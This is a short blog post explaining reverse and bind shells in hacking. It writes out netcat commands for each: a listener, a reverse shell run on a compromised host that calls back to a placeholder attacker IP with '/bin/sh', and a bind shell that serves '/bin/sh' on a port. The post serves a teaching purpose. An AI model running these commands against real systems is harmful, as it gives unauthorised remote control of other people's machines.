Reverse vs Bind Shell

There are two types (perhaps more?) of shells that we attempt to establish when hacking a target: the reverse shell and the bind shell.

Reverse Shell

The reverse shell is the most common type of shell found in the wild. This type of shell goes like this:

  1. We open a port locally, such as 4444, using nc like this: nc -lvp 4444
  2. We "pop" a remote host and get it to execute nc $ourIP 4444 -e /bin/sh

This results in the remote system talking back to our port on 4444, giving us a shell on the remote system.

This type of shell is a "reverse" shell because the remote system is establishing the shell by talking to us. Normally you'd establish the connection from your local system, but the reverse shell literally reverses this logic.

Here's a dorky diagram I drew to illustrate the above.

Bind Shell

The bind shell is almost like a traditional connection - the remote server offers a network service on a port and you connect to it. This is how SSH operates.

The primary difference between the two shell types is a reverse shell connects back to us, which requires our networking infrastructure to let the connection in. The bind shell opens or "binds" to a port remotely that we then connect to.

A bind shell goes like this:

  1. We pop a remote shell and start a remote shell, binding to a port: nc -lvp 4444 -e /bin/sh
  2. We connect to the remote shell (nc $remoteIP 4444) and then take advantage of the access to elevate our privileges
Michael Crilly

Michael Crilly

A simple nerd.
Brisbane, Australia